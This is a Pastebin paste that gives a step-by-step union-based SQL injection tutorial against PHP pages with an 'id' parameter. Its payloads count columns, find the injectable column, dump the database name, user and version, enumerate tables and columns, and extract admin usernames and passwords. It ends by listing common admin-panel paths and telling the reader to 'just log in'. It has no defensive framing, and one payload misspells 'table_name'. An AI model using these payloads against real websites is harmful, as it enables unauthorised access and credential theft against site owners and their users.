Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Basic SQL Injection Tutorial by "Linux & Hacking Tutorials"
- 1) Counting columns: Increase the number untill you get an ERROR
- .php?id=1 order by 1-- ->no error
- .php?id=1 order by 2-- ->no error
- .php?id=1 order by 3-- ->no error
- .php?id=1 order by 4-- ->no error
- .php?id=1 order by 5-- ->ERROR!
- We got an error on 5, so the column count is 4!
- 2)Finding vulnerable column: add - before ID number, replace order by with union all select and start counting 4 columns: 1,2,3,4
- .php?id=-1 union all select 1,2,3,4--
- Page sends vulnerable column: 2
- 3)Gathering info about database: replace 2 in the syntax with group_concat() and add custom text inside the brackets
- .php?id=-1 union all select 1,group_concat(database(),0x3a,user(),0x3a,version()),3,4--
- Then we got database name, user and version.
- 4)Gathering tables from database: put table_name inside the brackets and add "from information_schema.tables where table_schema=database()--" to the rest of the URL before --
- .php?id=-1 union all select 1,group_concat(talbe_name),3,4 from information_schema.tables where table_schema=database()--
- Page sends tables: news,articles,photos,admins
- 5)Gathering columns from admin's table: In this case the admin login should be in admins table
- replace every "table" with "column" and add "from information_schema.columns where table_name=0xHEX--" to the rest of the URL
- The HEX represents HEX value of admins table which is 61646d696e73
- HEX converter: http://www.swingnote.com/tools/texttohex.php
- .php?id=-1 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e73--
- Page sends: id,user,password
- 6)Gathering admins' logins: put user,password in the brackets and add "from (table name here)--" to the rest of the URL
- .php?id=-1 union all select 1,group_concat(user,0x3a,password),3,4 from admins--
- Page sends: admin1:123456
- So, that means the user is admin1 and the password is 123456
- 7)Finding admin panel: You can use tools like this: http://www.scan.subhashdasyam.com/admin-panel-finder.php or do it manualy with
- /admin
- /admin.php
- /login
- /login.php
- /cms
- /adm
- ...
- When you find the panel, just log in :)
- That's all
- Video Tutorial: http://youtu.be/YMoJrJE0qfA
- Facebook group on hacking tutorials: https://www.facebook.com/groups/706155462750576/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement